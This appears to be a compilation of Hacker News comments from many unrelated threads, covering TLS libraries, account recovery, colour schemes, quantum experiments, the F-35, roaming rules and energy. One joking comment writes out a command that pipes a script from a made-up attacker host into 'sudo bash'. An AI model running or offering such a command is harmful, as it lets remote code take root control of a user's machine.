OCaml TLS: ~4400 LoC OCaml X509: ~1550 LoC OCaml ASN1: ~1400 LoC OCaml nocrypto: ~5250 LoC
The fact that they are focusing on the TLS protocol itself and not the actual encryption implementation is a good way to start; the "extraneous complexity" is not really in algorithms like RSA/ECDSA/AES since those are specified mathematically, but in the handling of the protocol messages and states. That is also where most of the bugs tend to be.
It reminds me of this Hoare quote: "There are two ways of constructing a software design: One way is to make it so simple that there are obviously no deficiencies and the other way is to make it so complicated that there are no obvious deficiencies."
My biggest issue with OpenSSL is that it also tries to do IO, but does it in a not too well-performing and non cross-platform way.
Anyone else think this was a contraction of the a11y, i18n, a16z or f6s variety?
More than that though, it think Sampras words ring true regardless of your occupation. Dont sweat the small stuff, celebrate every success, appreciate the people you have in your life.
Great way to start the day.
I would add that it is also worth reading Agassi's biography (Open: An Autobiography).
Together, these books provide a unique insight into life at the top of the game - and the impact this has on their lives. As a bonus, the views are from two players who were very different characters, were viewed in the media as being very different, and brought the best out in each other.
Tennis always seems to have more than its fair share of real gentlemen, and Pete is front and centre amongst them.
NFL players listen to this man.
So true in life..
In summary, for an app with an bug. You must know a) input that causes to bug to show up, b) input that doesnt cause an error. Then it will look for similar code in github, and try inserting the checks done from that code into the new code. And then it reruns the program, hoping that the bug is resolved.
This approach is very cool, and harnesses the power of lots of developer. But its also very limited. However thats what research is for. Small steps together are a big leap for mankind :p
I also like this conlusion in the article:
"""In recent years the increasing scope and volume of software developmentefforts has produced a broad range of systems with similar oroverlapping goals. Together, these systems capture the knowledgeand labor of many developers. But each individual system largelyreflects the effort of a single team and, like essentially all softwaresystems, still contains errors.We present a new and, to the best of our knowledge, the first,technique for automatically transferring code between systems toeliminate errors. The system that implements this technique, CP,makes it possible to automatically harness the combined efforts ofmultiple potentially independent development efforts to improvethem all regardless of the relationships that may or may not existacross development organizations. In the long run we hope thisresearch will inspire other techniques that identify and combine thebest aspects of multiple systems. The ideal result will be significantlymore reliable and functional software systems that better serve theneeds of our society."""
Edit; this one is open source; is the MIT one ? Couldn't find references on the page?
But seriously: autogenerating fixes as observed by fuzzing does sound cool.
> An Obama Administration official tells Re/code that recent advances in using automated methods to analyze software code for vulnerabilities have spurred interest in government circles to see if theres a way to standardize how software is tested for security and safety.
I just wonder what will happen to Google's Project Vault  now that Mudge is gone. Hopefully it will still be on track.
The first step would be to edit the title of your submission to begin with "Ask HN: hacked Google account, what to do?", since you're asking a question.
"Google hacked account" means, to an English speaker, that Google perpetrated hacking against some account somewhere. E.g. Google people gained access to your bank account. I.e. your current submission title is clickbait.
Additionally, you have to track every change with a timestamp so that you can invalid everything that came AFTER the change you just reset. That will prevent a hacker from being able to screw with the account because the original email address will also be able to cancel future changes, no matter how many times the perpetrator did it.
The prospects for the rest of us are fairly bleak.
Did you set the recovery email the same as the main email? Cause I only get password reset to the recovery email.
If you used the same address for recovery email, then it defeats the whole purpose
I'm hoping you'll say no, because my feeling of security comes from the fact I've enabled TSV.
Email is the most sought after account. All the password reset requests to your Bank, Twitter, Facebook, etc. are delivered to your email account. So when someone steals your email account, they've stolen all the others too. Go change those accounts to use your new email (if you can).
It is not difficult to do without them.
Asking for help on HN or Reddit works sometimes, but if your business (or personal life for that matter) relies on their services you should really work towards being able to do without them.
Unfortunately, it's a tough situation since for all Google or we know you could be the hacker trying to get into the account and hard for them to verify who you are, since if the hacker was able to steal person's phone to bypass 2 factor authentication, they may also have access to a copy of your drivers license or ID to send to google in an attempt to verify they are you.
While far from ideal, assuming you don't have a close friend to contact google for you via their google apps admin account, you could create a new trial google admin account and then contact google through that mentioning your situation of your other account. While they will still have to find a way to verify who you are at least you'll reach a real person.
On the other hand, it is a free service. If you'd have the business subscription, they do have a helpdesk you can contact by phone: https://www.google.com/work/apps/business/support/
I believe i can help.
It appears I'm not the only one:
> Solarized is a sixteen color palette (eight monotones, eight accent colors) designed for use with terminal and gui applications. It has several unique properties. I designed this colorscheme with both precise CIELAB lightness relationships and a refined set of hues based on fixed color wheel relationships. It has been tested extensively in real world use on color calibrated displays (as well as uncalibrated/intentionally miscalibrated displays) and in a variety of lighting conditions.
I'm assuming this means it's giving a criterion to "measure" how good it is in a not-entirely-subjective-way. That always bothers me about selecting a theme. I have no idea if it's good or bad in any standard measurable way.
I look at these themes and can't really tell what it's "unique properties" or anything interesting about it just by looking at it.
I love the Tomorrow-Night theme:
On Github: https://github.com/chriskempson/tomorrow-theme/blob/master/v...
Whoever solves that problem earns a raise
Solarized is too low-contrast for me, so I have hacked-on support for hybrid (solarized syntaxes + tommorow color codes), but it's not really uniform. And, imho, well-balanced contrast is the most important thing.
Non-exhaustive list of applications that I'd like to see supported - vim, emacs, tmux, weechat, vifm, newsbeuter, taskwarrior, mutt...
Then when I go inside/outside again I have to switch it all back. Quite a hassle. Has anyone found any trick to automate this? For starters I wouldn't know how to change the colorscheme of all my Vim sessions. Can you send a signal to your Vim sessions maybe? Then changing the terminal colorscheme is of course dependent on the terminal app you're using.
> "[VPNs are] used by around 20 per cent of European internet users they encrypt users"
I think it is more like 2%. I don't know anyone but me who uses a VPN. I'd even say that if I picked 100 people I know, less then 20% know what a VPN is.
Furthermore, the article makes IPv6 sound bad. If I didn't know what IPv6 and VPNs are, I might think it IPv6 is bad, too. I'm also interested in knowing which VPN softwares they tested. While I'm certain that old VPN Softwares leak IPv6 IPs, I can't say that for all VPN softwares I use: OpenVPN (on Linux and Tunnelblick on Mac) and Mac's built-in VPN software (which supports L2TP over IPsec and PPTP). It is really a shame, though, that my VPN provider does not support IPv6, yet.
The only thing that really leaks my real IP is WebRTC. Thanks to WebRTC, everyone can see my real IP address and I can't disable in google chrome. If you want to check what information your VPN is leaking, checkout: https://ipleak.net/
Even if they weren't, I fully agree with progressive enhancement. It is always going to provide the right incentives for everyone. Only the features most used (by end-users) will become browser vendors' utmost priority.
If you're interested in porting your binary to Linux/Mac/SteamOS using a Wine wrapper, throw my company an email. That's exactly what we do :)
The page has a lot of graphics and characters using strikethrough which confused me and looks somewhat unprofessional. I suspect the author might be losing conversions due to the complexity of this page. I would prefer a simpler buy page that put the actionable content right at the top. (I'm just looking for a regular commercial-type purchase of an early access game, not being a backer per se.)
I'm sharing this as constructive feedback in the hope the author might see it. A customer like me will appreciate a simpler, direct buy page that doesn't require a lot of thought from "oooo this looks fun" to making the purchase. Capitalize on impulse buys coming out of your demo.
Anyway, very polished and fun from the few minutes I've had to play it so far. Nice work!
This game is easily as polished as, or more polished than plenty of games on Steam Greenlight. Steam was the first place I looked for it, actually, after reading the article. A game like this should attract huge interest among the right audience if it's replayable. You have flashy and normal enough graphics with an easy-to-understand interface that regular gamers can enjoy it, and it also seems like it will appeal to the hardcore roguelike gamers. I'd highly recommend you try to get it on Steam as soon as you think it's ready (speaking as a person who makes a lot of video game purchases on Steam and not many outside it).
Then I remembered the general problem with commercial games.. went straight to the FAQ and searched for "linux".. bummer.. I guess somehow I expected a roguelike to work on Linux :)
I will observe the game and hopefully someday a Linux version will emerge. Good luck to your quest as indie dev!
This is meant as sincere constructive critique, so feel free to downvote ad libitum.
When I have the spare funds I'll be sure to pick up a copy!
This helps a lot though, so i think ill be back on after work tonight to put some more polish on!
First, "realism"  is not the same thing as "reality". "Realism" basically means "physical quantities have a definite value". "Reality" is that thing that determines your experimental outcomes. Don't mix them up.
Second, interpretations of quantum mechanics disagree wildly about what kind of weird you use to explain things. Some interpretations have "realism", some don't. Some interpretations have retrocausality, some don't. Some interpretations have FTL effects, some don't. Since all the interpretations give (mostly) the same experimental predictions, it's misleading to single one out and say just that particular brand of weirdness was confirmed.
We confirmed that there's weird there. We didn't distinguish what brand of weird it is. Physicists widely disagree about which brand of weird to use, with no position achieving even a majority . The original title was better.
The properties these experiments are measuring are simply bogus. They are not well defined. The answer that comes out is not some intrinsic property of the "particle", but the result of the environment in which the particle interacted with the "measurement" system, so to speak.
The particle has some other properties, but what's being "measured" is not one of those properties.
How can I explain?
Imagine someone who has never tried any Korean food, and you try to ask him/her: what's your favorite Korean food? There's no answer. So you try to "measure" it by feeding him some Korean items and recording his facial expressions. He will like some items more than others, but it has nothing to do with "his favorite Korean food", and has more to do with how the items were prepared and his mood at the time.
A "point" location for a photon is never defined; it's not a property of a photon that it exists in a point in space. When you fire a photon at a "wall" and see a "blip", you're not seeing the position of the photon at some point in time. You're seeing the rough position of the atom that had an electron that absorbed the photon's energy, and I'm not even sure the atom has a well defined point position either. The whole thing is an artifact (a side effect) of some interaction between several systems and doesn't really tell you anything fundamental about the photon (or the quantum object).
At least that's how I understand it.
Maybe this is really just a fundamental challenge to our assumptions about motion of particles or information transfer in the universe. Isn't that interesting enough without these vague, human aggrandizing assertions about creating reality?
COMPUTER SIMULATION vs HOLOGRAPHIC UNIVERSE
This is something that I've thought about for some time, I posted a question about this a number of years ago on Reddit: http://www.reddit.com/r/Physics/comments/g287k/quantum_indet...
So does a thing which is not affecting anything else and not being measured exist? No! QED
So much physics reporting mistakes science for philosophy. It leads to so much confusion among laypeople.
It seems like at least Philosophy 101 should be mandatory to quantum physicists.)
Reality doesn't depend on an observer (who distorts it by his observation). Reality just is.
There are light and other temporary states of what we call "energy". That's it. Time, space, relativity are human concepts - the hard-wired modes of perception which conditions our experience. From a Photon's perspective none of these exist.
the non-interference pattern is the optimized result of a deterministic universe that requires the observation to occur. The measurement didn't reach back in time, the results were specifically determined by the same causal chain that determined an experiment would be performed.
Essentially, we're all watching our own multi-dimensional, multilayer, composite TV channels and seeing shadows of each other across our screens. Allegory of the Cave meets 3D Ray Tracing and such.
That's nothing, though. Not compared to the realization that every face is a mirror, and we're all stuck here until we can treat each other as ourselves.
Maybe it's not true, maybe it's insane ramblings. But it does explain the crazy doods muttering to themselves on the corner and those people in your life who "just aren't watching the same channel as the rest of us."
 layman-friendly article / interview: https://www.quantamagazine.org/20150604-quantum-bayesianism-...
This understanding is in line with this experiment without believing that future affects the past. It's just that atom is never a particle until it reaches detector at the end. Only there it displays ability to exchange momentum with one other single atom as if two billiard balls hit. Throughout the whole experiment it travels as a wave, both paths, grating or no grating. It just either interferes if there was second grating or not if there was no second grating.
Also the deference to the Copenhagen interpretation is annoying - it's wrong. What they've observed is a consequence of how decoherence works, and 'observation' has nothing to do with it. Not faulting the researchers on this but seriously, it's time to stop talking about mythical 'observation' as though it's some integral part of quantum theory.
It could mean that time on quantum scale doesn't differentiate past/future.
I'd like to issue a pull request..
Does measurement have to include an agent? Could measurement mean interaction with other atoms?
What is the conclusion if you are the thing being observed?
Sounds like that light existedand generated and responded to agravitational field after it wasemitted and before it was detectedor measured.
Is that equivalent to "reality doesn't exist until it is measured"? Because I don't see the latter claim (which is the headline on HN) anywhere in the text?
Also, didn't Feynman explain in q.e.d. that it's not either a wave or a particle, it's always a particle and the probabilities for the path the particle takes behave like waves? (Something like that, I am foggy on the details).
The paper is at http://www.nature.com/nphys/journal/vaop/ncurrent/full/nphys.... We changed the URL of this submission from http://www.independent.co.uk/life-style/gadgets-and-tech/new....
"Measuring" is applying our sensors onto the external reality and producing a map of what is observed in the form of thoughts, ideas, imagery - 'perception'.
But since the sensors are also part of reality, which does not exist before sensing it, it can be postulated that what is perceived is not a consequence of reality hitting the sensors, but the result of a new thought about reality being perceived, or simply - an invention.
That is, reality (including your body, brain and you) is the product of a thought process, but (here's the interesting part) the thinker is you and not you at the same time, or rather - the thinker is you and every other being.
That thinker is called God. Or Universe or whatever you want to call the thing or being that is the eternal recursive loop of self-invention / self-perception.
Of course very hard to put into language, but easily grokked under psychedelics.
It's interesting that science (and math) is slowly pointing towards this conclusion too, a thing that many great scientists arrived at intuitively.
The tour costs around $100 and includes "medical insurance" from the government.
There was a documentary (from ~2008) about the red forest. Vets, biologist, oncologist investigating the state of life there. Plants and animals came back. They (and I) expected crippled mutated species but so far they were fine. The claim was after a few years, radiation resistant (to the nowadays amount) species survived, X-men - Bambi edition, leaving me wondering how much we could learn from that about nature and life-forms resilience. In the case these claims are correct and solid.
Because it has chemical properties of calcium, so can participate in your metabolism and remain in your body (bones), constantly irradiating you.
I really should setup my gmail account in mutt, it could save me a lot of alt-tabbing time.
LOADING RESOURCES (8/50)
It has been pretty neat to see the revival of the machines in the last two decades - and the scene that is producing new titles for the machines are pretty neat folks: computing purely for the love of it, producing titles of such brilliance that one could only have wished it happened 30 years earlier.
.. and the Impossible Mission .TAP file:
"Stay awhile! Stay FOREVER!!!! Hahahaha ..."
(More great Oric titles, along the lines of the 80's classics like IM and more, available here:
If you love Impossible Mission, check out SPACE 1999, SKOOL DAZE, DON'T PRESS THE LETTER Q, and more!)
(sortable, filterable, searchable)
Imagine breaking an image down into pixels, actually storing them into a database, performing some queries, and outputting the result. Something equivalent to that (sans database) sounds interesting to me.
PixQL: SELECT WHERE COLOR = #FF0000FF; OPERATE SET COLOR = #00FF00FF JS : if (rgba=='FF0000FF') rgba='00ff00ff' PixQL: OPERATE SET G = R JS : g=r PixQL: SELECT WHERE ROW % 100 = 0 OR COL % 100 = 0; OPERATE SET COLOR = WHITE JS : if (!(row%100) || !(col%100)) rgba="ffffffff"
It seems like the image equivalent of treating an HTML file as a huge string of characters -- instead of as the representation of a DOM tree. Which makes very little sense.
Plus, you seldom want to do trivial things like selecting red pixels and flipping their color to green. You want to select red eyes and flip those to their correct color.
"But in photoshop, I instead am relying on the problem being solved externally ("ok, how can I find the right menu that deals with this kind of operation? what's the word the designers of photoshop used to describe this... I hope if I google it in plain text it might link to a forum post or something of someone with the same problem?")."
This is valid for most cases when GUIs are harder to use than a CLI with syntax.
- show it on http://www.reddit.com/r/tinycode/
- if you aim for low character count instead of low byte count, you can pass your code through my unicide packer here: http://xem.github.io/obfuscatweet/
- Golf your code even more (using the tips of the other comments), and use all the remaining chars to add features to your game and fill the 140 chars of a tweet :)
Depending on how much you cheat, you can get about two bytes of data per Twitter character. That'd allow 256 bytes of game to live comfortably within a single twit, which is a quarter of an unexpanded ZX81 RAM. By comparison, that would take almost ten seconds to load off tape. You should be able to get a respectable ZX81 game in that.
Here's a 2048/Threes-clone in <700 characters (or 5 tweets):https://twitter.com/eigenbom/status/615424395192877056
curl http://www.hackerz-r-us.ru/really_awesome_game.sh | sudo bash #YouveBeenP0wnd
(Concept inspired from Jennifer Dewalt's project, but code is entirely mine :))
Most of these would also fit in a single tweet ..
Because it's supposed to be able to dogfight, compromises in its other capacities have been reduced. Now we find out that, as everyone knew, it can't dogfight. So why even design it to do a mediocre job of dogfighting when they could equivalently eliminate that design constraint and allow it to do its other roles better?
The simple fact is that the military has tried to bite off more than it can chew by asking that the F-35 can do everything at once. Because the F-35A is slated to replace the F-16, other sacrifices have been made to make it sort of approach being kind of nearly as capable as the F-16. As a result, it is doing its other roles worse than what would be the case if the military instead accepted that one size does not fit all and removed that requirement.
Frankly, it doesn't matter how unrealistic the idea of dogfighting is. The military said 'make this thing able to dogfight at least equivalently to the F-16' so LM have gone away and made specific design decisions to try to achieve that. It's now fallen short of that target, and in doing so has also compromised other capabilities.
According to Aviation Week, a reputable defense and aviation source, the F-35 has been doing loading tests. Meaning that if this report and dogfight happened then it was against a electronically limited F-35 against a platform that is very mature and limits understood. Here's a link to the story in question: http://m.aviationweek.com/defense/f-35-flies-against-f-16-ba...
Three Danish defence experts pointed out that while the F-35 is the most advance plane "available", it doesn't matter. While dogfighting is out date, high tech is equally useless. Neither Denmark nor the US have been in a conflict since WWII, where the advanced features of the F-35 would have made any difference.
Unless you decide to go to war with Russia or maybe China, the F-35 is so far beyond what you would reasonable require that the cost is completely unjustified.
Sadly for Denmark we pissed of SAAB and they will no long bid to deliver plane to the Danish Royal Air Force, despite them having having a suitable plane.
Cost, conflicting interests, technical challenges and secrecy requirements in the worst possible package.
A tomahawk missile costs about $575k per unit, that lets you buy about 2 million tomahawks for $1 trillion. If you built a drone version that could loiter over an enemy airspace and then attack, sort of a tomahawk version of the Predator, you could buy a hundred thousand of them even if they were 10 million a piece.
You could also built UCAV fighters that could out-turn and fly most fighters by avoiding the need for the cockpit overhead and restrictions in g-force. Missiles make 40g turns, and drone airfames have been build to sustain 12-15g turning.
Are we spending a trillion dollars because the AirForce has a romantic notion of a human dogfighter in the seat when a guy with a joystick could do the job? Top Gun is a lot less interesting if robots or teleoperation is in play, but do we really that kind of engagement?
I think the close combat air support / tactical role should be given back to the Army (changing Johnson-McConnell agreement of 1966 and Key West Agreement) and the Air Force can deal with strategic bombing and air dominance.
The Air Force has been trying to get rid of the A-10 with various excuses, but the GAO recently said their budget reason were bunk. They just don't want the job and their loiter time of their replacements is pathetic.
The highlight for me is the last line:
The fact that the F-35 is maybe not really a good fighter at all is reminiscent of the question that weve been asking for years if you dont really need competitive maneuverability, than why do we need a fighter at all?
Here's what a Eurofighter test pilot had to say about the F-35 kinematics claims:
We have clearly shot past the point where anyone would dare risk employing the F-35 in any combat role.
The F-35A is expected to match the F-16 in maneuverability and instantaneous and sustained high-g performance, and outperform it in stealth, payload, range on internal fuel, avionics, operational effectiveness, supportability, and survivability. It is expected to match an F-16 that is carrying the usual external fuel tank in acceleration performance.
The A variant is primarily intended to replace the USAF's F-16 Fighting Falcon.
While there is some romanticism still attached to fighter pilots the truth is in this day and age their relevance is dropping like a rock and there is little need to put pilots into danger when a drone can do the same.
plus drones can be created to do all sorts of maneuvers human pilots could never do... let alone reduce the size of the craft to make it less visible
A trillion f ing dollars!! For that amount, you could fund 1000 startup companies a million dollars each to develop their best fighter, and stage a knockout tournament until you have whittled it down to the 15 best designs and you'd still have $993 billion to spread among the surviving designs.
Oh, your war drones have humans strapped to them...how quaint. --Some future general
The claim that The helmet was too large for the space inside the canopy to adequately see behind the aircraft" is quite strange. Despite developmental issues, the F-35 Head-Mounted Display has been completed and displays imagery in a complete sphere (4pi steradian) from the aircraft's Distributed Aperture System. Additionally, the F-35 has a somewhat roomier cockpit than the F-16, though rear visibility is more obstructed.
The control systems are still being tuned to some extent as well. The F-35 is fully fly-by-wire, and it tries to make sure the aircraft can't be overstressed or stall, but these limits can be too conservative. I'm not claiming that maneuverability will drastically improve, but this is one of the many objectives of testing.
I can almost understand why the new jet is having a hard time replacing the previous one. I say almost because at a trillion dollars... Lol
But then the F-35 is supposed to be stealthy so might be able to attack from a distance with relative impunity.
Pierre Sprey F16 and A10 co-designer speaks about F35 and specifically about dog fight 04:00 in the video. Stealth capabilities 06:00 in the video.http://www.dailymotion.com/video/x203cgj_pierre-sprey-co-des...
Given the design freedom with multiple airframes, I would think it quite hard to outdo such divergent airplanes as the F-16 and A-10. Unless the spare-part situation is crippling, conservative design would be to tailor to individual roles. Call it a Unix approach to air combat?
1 Trillion dollars for a shit plane...but we can't afford to take care of the veterans and retirees.
It seems like he's pretending that we have, or will have, no other fighter jets remaining.
The F35 is not designed for dogfights but long range missle fights and stealth.
>the Air Force organized specifically to test out the F-35s prowess as a close-range dogfighter
They fail to mention that dogfighting is as antiquated as Snoopy and the Red Baron. Talking about this test without the context is plain irresponsible.
Modern air superiority strategy is about delaying detection with stealth combined with advanced electronic warfare and coordination intelligence suites to destroy the enemy before he even sees you, or at least when it's much to late to have any meaningful response. It isn't 'perfect' stealth, but it doesn't need to be. Just need to get close enough that your missiles get to where the need to go opening up the theater for other assets to do their thing.
"Too close for missiles, switching to guns" is ancient history.
The F-35 is no good at dogfighting because it wasn't designed to be, the test was just something you do to test your outer limits. "Failing" isn't failure.
I'd rather see a swarm of drones one tenth the size and one twentieth the price fight our dog fights.
you can't see behind the F35 - even if you turn your head. there's a rear view camera because of that. The central fan is in the way.
That's odd a pilot says he can't turn his head and see well.
God, I love bureaucrat-talk. It's a pig. A trillion-dollar pig. But that doesn't mean we can't put lipstick on it!
Last time this came up on HN, somebody recommended reading about the life of John Boyd. For those of you interested in how large systems of people operate, how the Pentagon ends up with bad airplanes, principles of organization change, and the philosophy of strategic planning? Go read as much as you can. Boyd was no Sun Tzu, but he significantly advanced the state-of-the art in a bunch of seemingly unrelated fields. I have a feeling we'll be parsing some of his stuff over the next few decades.
Aside from providing promotions to large sections of the officer core and gainful employment to many large defense contractors in various districts of various politicians, I'm not sure what the F-35 is actually for. It's like the space shuttle: it's supposed to do so many contradictory things at the same time that it doesn't seem to do any of them well.
In fairness, the Osprey tilt-rotor had a lot of the same type of procurement and delivery problems. Anybody remember ring vortex state? But the Osprey at least had somewhere it was going: take a squad of marines or special operators far inland as fast as an airplane without using runways at either end. It looks like the Osprey is turning the corner and can finally deliver the goods.
Not so much with the F-35.
I'm not sure what to do with the program now. My instinct says keep the close air support and air superiority fighters we have and concentrate on the F-35's stealth capabilities. But strategically, once somebody figures out how to use passive radiation to paint and plot airborne targets? The stealth game is up. Required computing power may be a decade or two away, but it's well within the expected lifetime of the airframe. I think maybe you just bail out on the whole thing and go back to strategy school.
when you think about the current situation in Irak, one might argue that it would not necessarily be a bad thing.
EDIT: this, for instance, seems much more interesting: http://www.fool.com/investing/general/2015/02/22/us-navy-to-...
But it's hard to see how dogfighting prowess would be any help against long-range radar systems that can detect it before being in range.
They're not settling with $1M donation to EFF, they're still getting $2.1M from Lovely.
"... this was decided by the supreme court definitively in unanimous decision regarding, for instance, phone numbers in the case Rural v. Feist (http://en.wikipedia.org/wiki/Feist_v._Rural) ... The facts are just facts. They are not creative expressions. They are descriptive information and as such are outside of the bounds of what copyright law was intended to cover.
... In other industries it is a long-standing practice of comparing prices, supply and demand. My background at the federal reserve tells me, thats how markets work. The concept, that it is intellectual property, when its really just transparency of price, supply, and demand, and thats how markets work, is a real stretch. Its something that could, if it continues to go this way, it could, basically, break the Internet, where you have to have permission to compare prices, and compare supply and demand between different sources of goods and services.
.. We just think that the business of on-boarding the postings and charging for it is entirely different from the search and downstream interaction."
That reminds me of a comment from when smart TVs were discovered to be sending filenames and other info, since it was sent in plaintext: "If they had used HTTPS, this might not have been discovered."
The most important thing to realise is that security can work for you, and it can also work against you. It's not only a "right to eavesdrop", but users will need to maintain control over their devices if they want the former. This is somewhat related to the War on General Purpose Computing, and what I think is the biggest dilemma is that users need to have a certain level of knowledge in order to understand what their devices are doing and control them; but many don't want to; they only see the advantages and don't care about how something works, whether it "phones home" or what kind of data it's sending, as long as it makes something in their lives easier.
News stories about how smart TVs phone home have circulated, and yet AFAIK people are still buying them in great quantities. They just don't care. They are outraged and shocked when the news appears, but shortly afterwards they carry on as if nothing happened. That, I think, is the scariest part.
2. I'm not sure that communication transparency is what led to the success of PCs, smartphones, and the Web. Perhaps the Web, but definitely not smartphones. People had to fight tooth and nail for the right to root or jailbreak their own phones!
3. How do you add the ability to eavesdrop on a device without compromising TLS or adding a remote back door that anyone could exploit? The only way that I can think of, and the only way that this has traditionally been done with PCs, is to give local root to the owner.
If the owner has root, then he can make the device trust his own certificate and proceed to MITM it with his own router. But an owner with root can also modify the device's "firmware" to make it behave in ways that the manufacturer never intended, and manufacturers will do everything in their power to prevent this. Nobody wants to admit that they're actually selling general-purpose computers.
If the manufacturers are not going to cooperate (and I don't think they will), then perhaps what needs to happen is that we should start rooting/jailbreaking every smart device we can get our hands on, and thereby force them to be transparent. It can't be that difficult, after all. Where are all the clever folks who helped root and jailbreak our phones? Let's send them some TVs to play with, warranties be damned. Perfect security doesn't exist, and we can use that fact to our advantage.
To be specific, it maxes out the CPU even when it's not doing anything. Given that it's supposed to emulate low-level hardware, at very slow speeds, and does not have any demanding graphics, I fail to see why it should do that.
(It's something I've seen happening in more games as of late, actually. For example, Desktop Dungeons - a very fun game which has no business demanding anything from my computer since it's turn-based, uses sprites, and barely animated. And yet my laptop heats up as soon as I open the game.)
In fact, it's a bit ironic, given that the whole theme of the game is squeezing out performance out of bare metal hardware, and I admit that I'm more annoyed by it for that somewhat irrational reason.
(I get a bunch of errors on OS X unless I change "CC=gcc" to "CC=clang", btw)
 https://en.wikipedia.org/wiki/PIC_microcontroller https://en.wikipedia.org/wiki/Charge-coupled_device
From what I've understood operators will reintroduce wholsesale roaming prices, which means that home operator will still pay for traffic while their clients are roaming.
This will bring us cheaper roaming but we will most likely have two separate packages - for domestic use and capped ones while roaming.
Roaming will be banned in 2017, and from April 30, 2016, surcharges for roaming will be capped at a maximum of 0.05 per minute for calls, 0.02 for SMSs and 0.05 per megabyte for data.
Then the iPhone came out, and an unlimited international data plan was an additional $60/month, I believe. Basically doubling the monthly cost, and that didnt have tethering.
THEN, they got rid of that altogether, and ever since its been a scramble in every country to buy a SIM card just to pay local rates and not get ripped off. Its all the same internet if youre not at home and roaming agreements exist, the carriers should just be forced to pay each other fair rates.
To be honest i cant back this up with arguments and/or data. But this is what i heard from telecom specialists in the field.
Hell, KIF even forced you to make sure you had accessibility strings on stuff like icons and shapes. Looks like this continues on the same path.
Regarding "There is currently no way of waiting for elements to appear or disappear."
I haven't tried this, but maybe you could just wait with a condition? https://gist.github.com/seivan/0becfffbb1d7665cebfe
Or use the XCTestExpectation stuff that came with iOS 8. https://gist.github.com/seivan/d2dee9fcff0177cb3b93
No kudos for presentation. I've tried to look at two works, typewritten MSS by Vachel Lindsay and Sara Teasdale, and the text display is awkward. The initial presentation is too small to read. Looked long for a zoom control. Finally tried "full browser" link which does display the current page with a zoom control and the ability to drag that page around in a small frame to read it.
While it is nice that UT is doing this, it is sad that each uni has to do its own thing. Can there be no one virtual repository where all such collections -- or at least their catalogs -- could be amalgamated? It's like the bad old days of physical libraries: the scholar has first to find out which collection has the thing she needs, and may never learn that it exists. If they don't want to deal with google books, how about using TIA as a front end?
Edit: ...and then I looked at the URL, hrc.contentdm.oclc.org and thought, huh, that doesn't look like UT or EDU... turns out oclc.org is something like I was just asking for, a front end content distribution platform for multiple libraries. OK then. TIL and all that.
One example I think is pretty interesting is Island Newspapers  where they have scanned every issue of a newspaper in PEI, Canada called the Guardian going back to 1890.
The Django app and libraries running the site are built and maintained in-house, and are open source:
https://github.com/unt-libraries the Django project/app itself is 'coda')
Direct link to the collections: http://hrc.contentdm.oclc.org/#nav_top
Getting out of display media for them is smart. Fundamentally they are a software company and there are already players that sell media better than they can. It isn't a software problem, it's about building sales relationships with media agencies.
A streamlined P&L and staffing strategy will let them focus on making a developer-centric product company. They will still make plenty of ad money, but don't have to staff for it.
Anyone who had to deal with the billing headaches at a search agency <raises hand> does not look fondly at that time.
I wonder what this will do to Search Partner Network performance for AdWords customers. AOL represented one of the biggest (if not THE biggest) search partners.
The Search Partner Network is one of the few areas of AdWords that is still a black box wrt placement-level performance (unlike the GDN). Previously the only way to get visibility into the AOL portion of it was to run directly with AOL using AOL's licensed version of the AdWords UI, but with some minor differences in how you used it.
If the biggest volume driver of Search Partner volume goes >poof< I'd expect that to noticeably impact performance for Search Partner traffic. Would love an official comment from Google on this here, on their blog, or through industry pubs like SearchEngineLand.
So instead of layoffs, they're just selling their employees*?
(Uber deal): https://news.ycombinator.com/item?id=9799997
Meanwhile, solar/wind is heading toward dirt cheap and trivial to set up. Environmental impact is minimal, too. It doesn't require giant corporations, government sponsorship, complex regulations, or exotic engineering skills to implement. With those incredible advantages, it doesn't need to be cheaper than nuclear - it just needs to be adequately cheap.
What?!? I certainly appreciate the ambition, but humanity has spent seven decades and at least hundreds of billions of dollars on this very same project. What in the world is this tiny startup doing with a $5mm grant that is so easy and cheap that could possibly lead to that kind of breakthrough in fusion energy?
That's what you can't do with solar - with solar you already have a big footprint to power that first factory, and your footprint increases proportional to power use. 21 century calls for scaling roughly 20x = 2x (population growth) * 10x (rise in developing worlds livining standards). I don't want 20x solar footprint.
Of particular concern in nuclear waste management are two long-lived fission products, Tc-99 (half-life 220,000 years) and I-129 (half-life 15.7 million years), which dominate spent fuel radioactivity after a few thousand years. The most troublesome transuranic elements in spent fuel are Np-237 (half-life two million years) and Pu-239 (half-life 24,000 years). Nuclear waste requires sophisticated treatment and management to successfully isolate it from interacting with the biosphere. This usually necessitates treatment, followed by a long-term management strategy involving storage, disposal or transformation of the waste into a non-toxic form. Governments around the world are considering a range of waste management and disposal options, though there has been limited progress toward long-term waste management solutions.
Individual solar panels and batteries, personal windmills, personal reactors, etc.
Imagine all the savings in infrastructure for energy transportation and reinvestment in other sectors. Imagine all the possibilities if people could switch their energy generation model as simple as buying a new product and installing it at home.
Individual energy independence, even if it will never be possible, that's where our dreams should be.
Then water, then food. That's disruption at seismic level. Post-scarcity world.
It's worth pointing out that the problems enumerated above are partly the consequence of energy becoming cheap and available during the last century (coal, oil, etc) not lack of it. But the main reasons are the dominating philosophical and ethical standards of humanity during the energy boom.Cheap energy + wrong philosophy = bad application of energy = problems enumerated above.
So if you want to tackle any of those problems, you have to work on both variables in that equation, just increasing the availability of energy without raising awareness of how to apply it, will lead to unsatisfactory results in the long term.
This makes a lot of sense.
Can anyone point out current research on this field? I don't seem to hear much about it.
Edit: Just found this after searching #photosynthesis in Twitter: http://www.huffingtonpost.com/2015/04/20/artificial-photosyn...
It's silly to describe solar as atomic energy from suns fusion as a distinct category from carbon-based energy, because of course carbon-based energy was formed by capturing solar energy from the sun's fusion.
Kudos to Sam for putting not just his money, but his time where his mouth is. If only the rest of the internet could do the same!
Even if they do figure out how to get engineering and manufacturing in place, then there are regulatory barriers to figure out. There will be politics involved, and legal challenges. And of course, you need to actually operate the sites on an ongoing basis.
All of these challenges can be overcome... but most people who know how to do so already work in the energy industry. What is really needed is a group of people who can bridge those gaps to take an innovate design from an engineers drawing board, and jump through all the hoops to make it a live production site. If such a group were to be built, real change could happen very quickly.
The reason that China and India are the only countries going after fission is because of a singular element - Thorium. Both India and China have huge reserves of thorium that can be unlocked with molten salt reactors that are unviable anywhere else in the world (including the US, which gave up on this a long time ago). Australia does have large reserves of thorium, but its projected energy needs are dwarfed by India and China's.
China is way ahead than India on this front with more than a billion dollars managed by Jiang Mianheng to conduct research into these new reactors. And which is why India is bending over backwards to sign the India-US Civil Nuclear Energy treaty.
